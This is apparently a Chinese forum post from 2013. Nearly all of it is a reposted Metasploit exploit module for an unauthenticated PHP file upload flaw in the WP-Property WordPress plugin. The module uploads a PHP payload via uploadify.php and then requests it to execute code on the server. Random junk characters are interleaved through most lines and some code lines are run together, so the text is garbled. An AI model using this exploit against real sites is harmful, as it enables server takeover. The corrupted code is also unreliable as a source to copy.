WordPress WP-Property PHP 文件上传漏洞* o; H5 k" a, j; M8 g( \' \9 v3 z
0 u- V: u; e* W: D ## # This file is part of the Metasploit Framework and may be subject to
' Y: r: X6 C7 T8 e- e; g5 C1 o/ s3 G7 D9 S9 u- ^
# redistribution and commercial restrictions. Please see the Metasploit
) A! e' P z+ n4 e* M: t1 S- |4 R, c3 M9 [7 a
# Framework web site for more information on licensing and terms of use.
( M) U- d6 x9 [) C( X
, G7 b6 {! O2 _: d2 e- @# http://metasploit.com/framework/ ##9 |$ z9 M, }, g' } {* \
' ?. }8 V/ \3 {6 R& n, T
2 L9 d/ a0 P4 U
6 d' m+ j4 G" x# t5 b5 D7 Z
0 A) c! j7 p4 L7 E1 s# O& b6 p/ z
8 B4 J+ q! u U8 V' p, |% C2 A$ q: u, D
require 'msf/core'/ b! m' w' E C, V3 N! z8 F( G' x
require 'msf/core/exploit/php_exe'
& E* }% q X1 r8 x% d3 s
[( ~8 u0 Z0 m' K# e5 t+ j% R2 ^/ Aclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',! v3 h' U7 g0 c. K
'Description' => %q{ Q* R1 u, w% @
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
% U8 M+ v5 D8 a0 @$ [* g0 w[5 i! J; B' Q# R/ _9 s
'Sammy FORGIT', # initial discovery
4 R' Y/ L. O: ?0 J) K+ r'James Fitts <fitts.james[at]gmail.com>' # metasploit module. x S2 ~- P" K Z' J
],
* L" A3 P/ D0 | _'License' => MSF_LICENSE,
/ o& S; W6 _) [( w0 l* t' d'References' =>4 V* [2 D& `2 ]+ s
[
+ [5 g( v/ C# V3 r; w3 M7 O[ 'OSVDB', '82656' ],. I! z! Y5 l+ J
[ 'BID', '53787' ],( a% c1 r" q" O
[ 'EDB', '18987'],2 K0 K# L* l9 ~! y9 w# v/ w
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]+ y1 `+ i/ V( F/ g0 J
],
% c/ g2 l! v1 M'Payload' =>$ N/ \$ X- V. C Q# u, T& W) S( S+ `8 X
{
3 p* @+ T+ y/ ?% n* R; E- s'BadChars' => "\x00",, d( V7 j5 d0 o$ H/ ^3 c, g/ L
},: h9 `& w1 h# W% T
'Platform' => 'php',
6 a1 J) W; ~" {% c9 E'Arch' => ARCH_PHP,
& Y/ ~+ X6 z6 |% n% p& P6 C'Targets' =>
$ a8 C: M* {- o$ \' ^[
6 A4 z' E; c! U6 ?[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
7 i: l g1 w( k/ s( Q3 y, }[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]# L: Q, c9 P4 S. B' H: S7 c
],
9 m" @8 ]0 |7 D1 Q5 X'DefaultTarget' => 0,' X) E* A6 `7 B! q+ A( n. a; T
'DisclosureDate' => 'Mar 26 2012')): ?' g5 b$ E7 N n! s$ [ y
`% F1 V, l! p3 b. e x# x
register_options(1 { w, ]. C8 A7 r% Y& |& x3 D8 G
[3 G6 {1 i& O* m
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress']) M. {6 F- _* @
], self.class)
H2 M8 h: N+ U8 b$ L+ ~end0 r" z* ]8 m/ k5 |
% R, _. I" t2 [. X( _def check2 V) g- R2 @% u5 l4 ~
uri = target_uri.path
- C9 B0 t( s! |0 muri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',7 j) k5 @0 u# ~" J$ t) U" ?
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
, a/ \& n c% W b0 a. H& \5 e}). k1 s$ F& Y. `
4 c5 I1 m; s e7 s8 j/ H
if not res or res.code != 200' u, }8 O, @5 g7 J/ k
return Exploit::CheckCode::Unknown7 J6 ^* v* m* m
end4 E& Q' s; e- {1 \, \
7 D3 s$ } I5 R' |, G' P' t( ereturn Exploit::CheckCode::Appears5 `6 `7 Q, x) @0 n$ \* J
end
9 G+ T6 m0 {, g+ h& }7 v& f' y9 }3 O5 U7 b7 c% |( z
def exploit) B, k5 k$ d/ l# g
uri = target_uri.path
: W9 ?2 j6 L2 B& F7 e2 C8 ?uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
- D; w+ k2 i3 d; Q6 C/ u9 }, Y' m) g5 y7 K0 |: i
data = Rex::MIME::Message.new
C e: f, [/ H4 C6 kdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
9 w8 s, d9 H0 ^3 \! ldata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
. s. l9 f9 h% m& v$ r+ n/ lpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')2 O$ R! c( \* @- a
t; e0 l$ o1 Z5 u; x0 X
print_status("#{peer} - Uploading payload #{@payload_name}")7 ?$ Q( i; [+ K u
res = send_request_cgi({8 F/ G! H7 G( o3 Q0 \. h
'method' => 'POST',
7 k6 d1 o; e! Y/ l2 s- r" i$ c4 a'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
4 V* b |6 |; y) P/ \- {& e'ctype' => "multipart/form-data; boundary=#{data.bound}",9 E; Z$ h' K. P
'data' => post_data
P% g# S6 M* u})
u1 F; E4 n; a8 z' h T$ `! K5 j c8 h: @/ H
if not res or res.code != 200 or res.body !~ /#{@payload_name}/7 n+ n% |* n7 i4 b U) Q8 P% [
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
7 f5 B- Y8 w* W% j' w2 [; J" mend8 Q) L% C( @4 M( U
* T: V1 A3 U+ _. @6 e
upload_uri = res.body
" S' R8 c4 ~( l# i* W* ?5 u+ F# S1 W; W
print_status("#{peer} - Executing payload #{@payload_name}")% P7 D8 p3 n* [- h8 ^3 t
res = send_request_raw({1 b! v$ E( {' m+ z, `4 [9 ]5 m4 ^+ u
'uri' => upload_uri,
" o8 Y. ^) q4 y3 C, j* o! l'method' => 'GET'2 ]5 y! U8 o5 z% h' o( |* |" s
})5 q( u* z" t$ E7 {: O, B" ?- t
end6 A$ [5 B/ Y b+ y4 `
end
, D, _- t6 @6 B( g+ o
) {7 u+ i9 B4 B( S4 t不要问我这写的是什么 怎么利用 我是说msf.
( N4 }/ u ^6 i" V6 c* `$ H3 E* g6 ?1 v' ~+ ^. i
|
发表于 2013-1-4 19:51:30
收藏
支持
反对